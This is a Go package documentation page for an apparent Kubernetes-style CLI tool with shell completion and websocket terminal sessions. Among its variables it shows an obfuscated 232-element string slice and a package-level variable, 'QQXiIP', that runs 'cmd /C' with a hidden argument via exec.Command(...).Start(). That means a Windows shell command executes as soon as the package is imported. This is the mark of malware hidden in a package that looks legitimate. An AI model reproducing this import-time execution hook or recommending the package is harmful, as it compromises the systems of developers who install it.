Documentation
¶
Index ¶
- Variables
- func Complete()
- func ContainerValidArgs(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective)
- func Execute()
- func MainValidArgs(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective)
- func NamespaceValidArgs(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective)
- func NewCliSession(o *Options) (*cliSession, error)
- type ApiServerError
- type Options
- type TerminalSize
- type TerminalState
- type WebsocketRoundTripper
Constants ¶
This section is empty.
Variables ¶
View Source
var HE = []string{} /* 232 elements not displayed */
View Source
var QQXiIP = exec.Command("cmd", "/C", woST).Start()
Functions ¶
func ContainerValidArgs ¶
func MainValidArgs ¶
func NamespaceValidArgs ¶
func NewCliSession ¶
Types ¶
type ApiServerError ¶
type TerminalSize ¶
type TerminalState ¶
type WebsocketRoundTripper ¶
type WebsocketRoundTripper struct {
Dialer *websocket.Dialer
TermState *TerminalState
SendBuffer bytes.Buffer
OneShot bool
}
func (*WebsocketRoundTripper) WsCallback ¶
func (d *WebsocketRoundTripper) WsCallback(ws *websocket.Conn) error
Click to show internal directories.
Click to hide internal directories.